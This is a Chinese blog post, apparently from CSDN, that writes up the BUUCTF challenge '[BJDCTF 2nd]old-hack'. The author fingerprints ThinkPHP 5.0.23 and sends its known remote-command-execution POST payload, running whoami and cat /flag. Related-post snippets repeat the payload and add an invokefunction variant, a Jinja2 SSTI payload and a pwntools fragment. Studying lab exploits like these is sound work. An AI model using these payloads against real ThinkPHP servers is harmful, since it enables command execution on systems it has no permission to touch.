【学习笔记14】buu [BJDCTF 2nd]old-hack

最新推荐文章于 2020-11-30 11:20:55 发布
最新推荐文章于 2020-11-30 11:20:55 发布
阅读量326 收藏
点赞数 1
分类专栏: ctf 学习笔记 文章标签: python java linux 安全 编程语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43553654/article/details/107686913
版权
 
 

首先打开网站一看,映入眼球,thinkphp,但是不知道是什么版本的所以就想办法构造一个报错来让它显示一些更详细的信息

http://59429912-fc6a-4d2d-945a-c1aabf47f19f.node3.buuoj.cn/?s=3

 
 

这样就可以看到thinkphp的版本了是5.0.23版本接下来就简单了求助度娘,查找thinkphp5.0.23对应版本的漏洞最后在网上找到了这样一篇,thinkphp5.0.23的远程命令执行的漏洞。

之后就可以尝试这个RCE漏洞是否可以执行

直接利用hackbar进行post传参,内容如下

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami

 
 

发现可以,那就直接利用cat /flag查看flag,构造payload

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /flag

 
 

得到flag

Noslpum
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BJDCTF_2nd PWN复盘
weixin_44145820的博客
03-26 667
目录r2t3one_gadgetydsneedgirlfriend2r2t4 r2t3 在name_check函数中有一个strcpy,看起来是溢出的机会,但是前面判断了长度,这里在汇编下才能发现漏洞 即只要长度超过255就会溢出 Exp: from pwn import * r = remote("node3.buuoj.cn", 29302) elf = ELF("./BJDCTF_2...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2764
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
[BJDCTF 2nd]old-hack
夜幕下的灯火阑珊的博客
05-13 954
知识点 thinkphp 5.0.23 RCE漏洞 题目 题目提示thinkphp5 构造index.php?s=1报错看看 看到版本号为5.0.23,搜索一波5.0.23漏洞 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload打就是了
[BJDCTF 2nd] old-hack
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-22 718
漏洞:ThinkPHP 5.0.23 RCE 参考https://www.codercto.com/a/54587.html http://ip_addr/index.php?s=captcha payload _method=__construct&filter[]=system&method=get&get[]=whoami
[BJDCTF 2nd] web题-old-hack
BROTHERYY的博客
07-13 339
复现环境:buuoj.cn 发现是thinkphp5,让页面报错找到了具体的版本号。 上网找了这个漏洞的payload POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 使用hackbar的post传递这个参数进去,查看根目录下的文件 读取flag flag{dc909607-e27c-40a9-86e8-2de6079ed503} ...
[BJDCTF 2nd]duangShell(反弹shell,swp泄露)
xlcvv的博客
04-28 1610
进入题目: swp文件,我第一次做CTF的时候就是swp泄露:[2019EIS高校运维赛]ezupload swp文件: 非正常关闭vi/vim编辑器时会生成一个.swp文件 关于swp文件 使用vi/vim,经常可以看到swp这个文件,那这个文件是怎么产生的呢,当你打开一个文件,vi就会生成这么一个.(filename)swp文件 以备不测(不测下面讨论),如果你正常退出,那么这个这个sw...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
buu [BJDCTF 2nd]rsa0
ao52426055的博客
11-30 505
查看题目 这个很明显需要nc一下 打开kali 这个直接写一个简单python的脚本就好了 import gmpy2 a = 17864794979971570785662379545162618804766262787343692042702758269883889880586532847627739497710377379133808960631449783320988646048192570215912044938749524 b = -136211411695969353402663153409
学习笔记 42】 buu [BJDCTF2020]Cookie is so stable
weixin_43553654的博客
08-02 344
0x00 知识点 Twig模板注入 0x01 知识点详解 什么是Twig模板注入? 答:这里推荐一位大佬的文章,看看人家的博客,才是真的强。 https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig 0x02 解题思路 什么都没有,点开flag 发现是个登录界面,尝试经典{{7*7}}后判断是Twig模板注入 再hint页面查看源码 发现提示指向了cookie,再flag页面登录的时候抓包分析。 推测出cookie里的user参数就是
[BJDCTF 2nd]old-hack -wp
freerats的博客
07-04 374
进入网站,看到提示,powered By THINKPHP5 知道肯定与thinkphp5有关 传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧) 版本为50.0.23 post提交 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 触发命令执行漏洞 cat /flag ...
[BJDCTF 2nd]old-hack ctf
wuyaowangchuan的博客
11-09 196
[BJDCTF 2nd]old-hack 告诉了我们是THINKPHP5的漏洞 搜这个版本的漏洞 发现是thinkphp5.0.23的命令执行 THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / _method=__construct&
[BJDCTF 2nd]old-hack --TP5 5.0.23
weixin_46200406的博客
10-25 105
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
[BJDCTF 2nd]old-hack_thinkphp漏洞
kuller_Yan的博客
10-23 229
[BJDCTF 2nd]old-hack_thinkphp5漏洞 进入页面提示是thinkphp,先构造一个报错 然后看到版本为THINK_VERSION5.0.23 然后百度查询漏洞: payload:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST提交尝试一下,发现可行,然后就cat /flag ...
BUUCTF old hack
zydbk123456的博客
04-26 627
1.打开页面,获取提示信息 打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞。在用这个thinkphp的漏洞前,先了解一下有关thinkphp的一些基础知识: thinkphp是一个用来简化企业应用开发和敏捷WEB应用的php框架。thinkphp包含了底层架构、兼容处理、基类库、数据库访问...
[BJDCTF 2nd]old-hack 1
feng的博客
11-12 1037
WP 一道直接利用thinkphp的RCE洞的题目。 首先进入环境,得知这是一个thinkphp5,通过输入?s=1来报错,获得版本信息(是一个小姿势): tp5.0.23这个版本以及相近的版本以RCE而出名的,去网上搜一波payload,搜到了: ?s=1 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 直接打就可以执行。 不过我一开始执行的时候,光看到了 system(): Cannot execu
BUU刷题--[BJDCTF 2nd]old-hack [GXYCTF2019]BabyUpload
weixin_48631429的博客
11-30 195
[BJDCTF 2nd]old-hack 打开题目看到 找了找也没有什么可以利用的信息 先试试一个thinkphp5远程命令执行的漏洞: ?s=index/\think\Container/invokefunction&function=call_user_func&vars[0]=phpinfo&vars[1]=1 然后就出现了 thinkphp5.0.23,思路很清晰了直接用payload: ?s=captcha,并且设置post:_method=__construct&am
BJDCTF 2nd WEB
A_dmin的博客
03-24 7589
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值